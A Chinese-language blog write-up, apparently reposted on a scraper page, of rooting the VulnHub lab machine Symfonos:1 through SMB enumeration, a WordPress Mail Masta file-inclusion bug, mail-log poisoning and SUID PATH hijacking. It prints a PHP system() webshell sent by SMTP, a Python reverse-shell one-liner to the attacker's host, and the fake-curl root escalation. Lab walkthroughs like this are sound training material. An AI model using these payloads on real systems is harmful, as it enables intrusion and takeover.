当前位置：首页 > news >正文

网站首页的图标是怎么做的怎么才能注册做网站

news 2025/12/20 19:32:36

网站首页的图标是怎么做的,怎么才能注册做网站,商业空间设计方案,福建seo希望和各位大佬一起学习#xff0c;如果文章内容有错请多多指正#xff0c;谢谢#xff01; 个人博客链接#xff1a;CH4SER的个人BLOG – Welcome To Ch4sers Blog Symfonos 靶机下载地址#xff1a;https://www.vulnhub.com/entry/symfonos-1,322/ 0x01 信息收集 …希望和各位大佬一起学习如果文章内容有错请多多指正谢谢个人博客链接CH4SER的个人BLOG – Welcome To Ch4sers Blog Symfonos 靶机下载地址https://www.vulnhub.com/entry/symfonos-1,322/ 0x01 信息收集 Nmap扫描目标主机发现开放22、25、80、139、445端口分别运行ssh、smtp、http、smb服务。 ┌──(root㉿ch4ser)-[~] └─# nmap -p- -sV -sC -A 192.168.196.141 Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-17 08:15 CST Nmap scan report for 192.168.196.141 Host is up (0.00034s latency). Not shown: 65530 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10deb9u6 (protocol 2.0) | ssh-hostkey: | 2048 ab:5b:45:a7:05:47:a5:04:45:ca:6f:18:bd:18:03:c2 (RSA) | 256 a0:5f:40:0a:0a:1f:68:35:3e:f4:54:07:61:9f:c6:4a (ECDSA) |_ 256 bc:31:f5:40:bc:08:58:4b:fb:66:17:ff:84:12:ac:1d (ED25519) 25/tcp open smtp Postfix smtpd |_smtp-commands: symfonos.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8 | ssl-cert: Subject: commonNamesymfonos | Subject Alternative Name: DNS:symfonos | Not valid before: 2019-06-29T00:29:42 |_Not valid after: 2029-06-26T00:29:42 |_ssl-date: TLS randomness does not represent time 80/tcp open http Apache httpd 2.4.25 ((Debian)) |_http-server-header: Apache/2.4.25 (Debian) |_http-title: Site doesnt have a title (text/html). 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open ᴮsՕ Samba smbd 4.5.16-Debian (workgroup: WORKGROUP) MAC Address: 00:0C:29:AA:38:6B (VMware) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop Service Info: Hosts: symfonos.localdomain, SYMFONOS; OS: Linux; CPE: cpe:/o:linux:linux_kernel 尝试DirSearch扫描80端口网站目录没有扫出来有价值的信息。由于目标主机开放smb服务尝试使用smbclient连接成功列出目标主机上的共享文件夹列表。其中Sharename为共享文件夹的名称print$为打印机驱动程序的共享文件夹helios为用户helios个人共享文件夹anonymous为匿名共享文件夹IPC$为IPC服务的共享文件夹。 ┌──(root?ch4ser)-[~] └─# smbclient -L 192.168.196.141 Password for [WORKGROUP\root]:Sharename Type Comment--------- ---- -------print$ Disk Printer Drivershelios Disk Helios personal shareanonymous Disk IPC$ IPC IPC Service (Samba 4.5.16-Debian) Reconnecting with SMB1 for workgroup listing.Server Comment--------- -------Workgroup Master--------- -------WORKGROUP SYMFONOS尝试连接到anonymous匿名共享文件夹因为一般来说anonymous不需要身份认证。发现attention.txt将其下载到本地并查看其内容为Zeus叫员工停止使用epidioko, qwerty, baseball这三个密码被他发现就要炒鱿鱼了那看来Zeus应该是个老板哈哈哈。 ┌──(root㉿ch4ser)-[~] └─# smbclient //192.168.196.141/anonymous Password for [WORKGROUP\root]: Try help to get a list of possible commands. smb: \ ls. D 0 Sat Jun 29 09:14:49 2019.. D 0 Sat Jun 29 09:12:15 2019attention.txt N 154 Sat Jun 29 09:14:49 201919994224 blocks of size 1024. 17305336 blocks available smb: \ get attention.txt getting file \attention.txt of size 154 as attention.txt (75.2 KiloBytes/sec) (average 75.2 KiloBytes/sec) smb: \ exit┌──(root㉿ch4ser)-[~] └─# cat attention.txt Can users please stop using passwords like epidioko, qwerty and baseball! Next person I find using one of these passwords will be fired!-Zeus尝试连接用户helios个人共享文件夹指定用户名为helios使用epidioko, qwerty, baseball这三个密码进行身份认证其中qwerty为正确密码。 todo.txt内容表明该用户要在/h3l105上工作由此猜测/h3l105可能为某网站目录。 ┌──(root㉿ch4ser)-[~] └─# smbclient //192.168.196.141/helios -U helios Password for [WORKGROUP\helios]: Try help to get a list of possible commands. smb: \ ls. D 0 Sat Jun 29 08:32:05 2019.. D 0 Sat Jun 29 08:37:04 2019research.txt A 432 Sat Jun 29 08:32:05 2019todo.txt A 52 Sat Jun 29 08:32:05 201919994224 blocks of size 1024. 17305336 blocks available smb: \ get research.txt getting file \research.txt of size 432 as research.txt (210.9 KiloBytes/sec) (average 210.9 KiloBytes/sec) smb: \ get todo.txt getting file \todo.txt of size 52 as todo.txt (25.4 KiloBytes/sec) (average 118.2 KiloBytes/sec) smb: \ exit┌──(root㉿ch4ser)-[~] └─# cat research.txt Helios (also Helius) was the god of the Sun in Greek mythology. He was thought to ride a golden chariot which brought the Sun across the skies each day from the east (Ethiopia) to the west (Hesperides) while at night he did the return journey in leisurely fashion lounging in a golden cup. The god was famously the subject of the Colossus of Rhodes, the giant bronze statue considered one of the Seven Wonders of the Ancient World.┌──(root㉿ch4ser)-[~] └─# cat todo.txt 1. Binge watch Dexter 2. Dance 3. Work on /h3l105访问/h3l105发现是一个WordPress网站Wappalyzer显示WordPress版本为5.2.2 0x02 权限获取 - WordPress任意文件包含使用wpscan扫描该WordPress站点发现其mail-masta版本为1.0可能存在漏洞利用。 wpscan项目地址https://github.com/wpscanteam/wpscan wpscan ┌──(root㉿ch4ser)-[~] └─# wpscan --url http://192.168.196.141/h3l105/ --plugins-detection aggressive ............ [] mail-masta| Location: http://192.168.196.141/h3l105/wp-content/plugins/mail-masta/| Latest Version: 1.0 (up to date)| Last Updated: 2014-09-19T07:52:00.000Z| Readme: http://192.168.196.141/h3l105/wp-content/plugins/mail-masta/readme.txt| [!] Directory listing is enabled|| Found By: Known Locations (Aggressive Detection)| - http://192.168.196.141/h3l105/wp-content/plugins/mail-masta/, status: 200|| Version: 1.0 (80% confidence)| Found By: Readme - Stable Tag (Aggressive Detection)| - http://192.168.196.141/h3l105/wp-content/plugins/mail-masta/readme.txt使用searchsploit搜索mail-masta相关漏洞利用代码并查看得知poc为 http://server/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl/etc/passwd/h3l105//wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl/etc/passwd ┌──(root㉿ch4ser)-[~] └─# searchsploit masta --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------Exploit Title | Path --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- WordPress Plugin Mail Masta 1.0 - Local File Inclusion | php/webapps/40290.txt WordPress Plugin Mail Masta 1.0 - Local File Inclusion (2) | php/webapps/50226.py WordPress Plugin Mail Masta 1.0 - SQL Injection | php/webapps/41438.txt --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results┌──(root㉿ch4ser)-[~] └─# find / -name 40290.txt /root/40290.txt /usr/share/exploitdb/exploits/php/webapps/40290.txt┌──(root㉿ch4ser)-[~] └─# cat /usr/share/exploitdb/exploits/php/webapps/40290.txt [] Date: [23-8-2016] [] Autor Guillermo Garcia Marcos [] Vendor: https://downloads.wordpress.org/plugin/mail-masta.zip [] Title: Mail Masta WP Local File Inclusion [] info: Local File InclusionThe File Inclusion vulnerability allows an attacker to include a file, usually exploiting a dynamic file inclusion mechanisms implemented in the target application. The vulnerability occurs due to the use of user-supplied input without proper validation.Source: /inc/campaign/count_of_send.php Line 4: include($_GET[pl]);Source: /inc/lists/csvexport.php: Line 5: include($_GET[pl]);Source: /inc/campaign/count_of_send.php Line 4: include($_GET[pl]);Source: /inc/lists/csvexport.php Line 5: include($_GET[pl]);Source: /inc/campaign/count_of_send.php Line 4: include($_GET[pl]);This looks as a perfect place to try for LFI. If an attacker is lucky enough, and instead of selecting the appropriate page from the array by its name, the script directly includes the input parameter, it is possible to include arbitrary files on the server.Typical proof-of-concept would be to load passwd file:http://server/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl/etc/passwd 页面成功返回相关内容即此处存在任意文件包含。继续尝试包含webshell由于没有找到文件上传点一般思路是进行日志包含即访问路径带有一句话木马写入日志然后包含。这里不采用这种方式因为前面信息收集发现目标主机开放smtp邮件服务所以想到可以给用户helios发送邮件然后包含其默认邮件路径/var/mail/helios。 ┌──(root㉿ch4ser)-[~] └─# telnet 192.168.196.141 25 Trying 192.168.196.141... Connected to 192.168.196.141. Escape character is ^]. 220 symfonos.localdomain ESMTP Postfix (Debian/GNU) MAIL FROM: Ch4ser RCPT TO: helios data ?php system($_GET[shell]); ? . QUIT250 2.1.0 Ok 250 2.1.5 Ok 354 End data with CRLF.CRLF 250 2.0.0 Ok: queued as C4C0840698221 2.0.0 Bye Connection closed by foreign host.访问以下路径发现刚才的邮件已经写进去了这里没有webshell代码是正常的说明被执行了。 /h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl/var/mail/helios 那么现在只需要反弹shell即可得到会话但我测试bash反弹不回来python则可以。反弹shell在线生成网站https://forum.ywhack.com/shell.php 192.168.196.141/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl/var/mail/heliosshellpython -c import socket,subprocess,os;ssocket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((192.168.196.128,7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);psubprocess.call([/bin/sh,-i]); 成功得到普通用户helios的权限。 ┌──(root㉿ch4ser)-[~] └─# nc -lvvp 7777 listening on [any] 7777 ... 192.168.196.141: inverse host lookup failed: Unknown host connect to [192.168.196.128] from (UNKNOWN) [192.168.196.141] 52208 /bin/sh: 0: cant access tty; job control turned off $ whoami helios $ id uid1000(helios) gid1000(helios) groups1000(helios),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)0x03 权限提升 - SUID环境变量查找SUID文件发现/opt/statuscheck可能可以利用但具体还是要看其能否执行命令。 $ python -c import pty;pty.spawn(/bin/bash) h3l105/wp-content/plugins/mail-masta/inc/campaign$ find / -perm -us -type f 2/dev/null inc/campaign$ find / -perm -us -type f 2/dev/null /usr/lib/eject/dmcrypt-get-device /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/openssh/ssh-keysign /usr/bin/passwd /usr/bin/gpasswd /usr/bin/newgrp /usr/bin/chsh /usr/bin/chfn /opt/statuscheck /bin/mount /bin/umount /bin/su /bin/ping使用命令strings大概看一下/opt/statuscheck干了些什么发现它会执行curl命令。 h3l105/wp-content/plugins/mail-masta/inc/campaign$ strings /opt/statuscheck ........... curl -I H ........... 来到/tmp目录新建一个名为curl的文件让其执行/bin/bash并将/tmp导入环境变量。 h3l105/wp-content/plugins/mail-masta/inc/campaign$ cd /tmp cd /tmp heliossymfonos:/tmp$ echo /bin/sh curl echo /bin/sh curl heliossymfonos:/tmp$ chmod 777 curl chmod 777 curl heliossymfonos:/tmp$ export PATH/tmp:$PATH export PATH/tmp:$PATH heliossymfonos:/tmp$ echo $PATH echo $PATH /tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin执行/opt/statuscheck由于其享有SUID权限会以root身份执行我们的curl而它会执行/bin/bash最后成功拿下root权限和flag。 heliossymfonos:/tmp$ /opt/statuscheck /opt/statuscheck # whoami whoami root # id id uid1000(helios) gid1000(helios) euid0(root) groups1000(helios),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev) # cd /root cd /root # ls ls proof.txt # cat proof.txt cat proof.txtCongrats on rooting symfonos:1!\ __ --/[})))*/ \ ,|\\ //| ,|\ \ //,/ -~ |) _-~~~\ |/ / || _-~ / ,(( / ) | \ / // _-~ _/_-~|((( ; / )/ / _ -~ _-~ ,/) )) ~~\ \\//| __--~~__--\ _-~ _/, ((( )) / ~~ \ /~ __--~~ --~~ __/~ _-~ /((\~\ | ) | / __--~~ \-~~ _-~\(\ __--( _/ |\ / --~~ __--~ _-~ ~|( ((~~ __-~ \~\ / ___---~~ ~~\~~__--~ ~~\~~~~~~ \-~ \~\ / __--~~~~~/;\ __.-~ ~-/ ~~~~~__\__---~~ _..--._;;;;;;;; / ---~~~/_.-----.-~ _.._ ~\ ;;;;;;; / ----~~/ \,~ \ \ ;;;; ( ---~~/ :::| \\. | _ ----~~~~ / :| ()))), ______/\/~ | / / (((((()) /~;;.____/;; / ___.---( ;;;/ )))))/ // _;______;------~~~~~ |;;/\ / (( ( // \ \ / | \;;,\ (_ \ \ /,/----- _ \_| \\_ //~;~~~~~~~~~ \_| (,~~ \~\~~Contact me via Twitter zayotic to give feedback!

查看全文

http://www.pierceye.com/news/310689/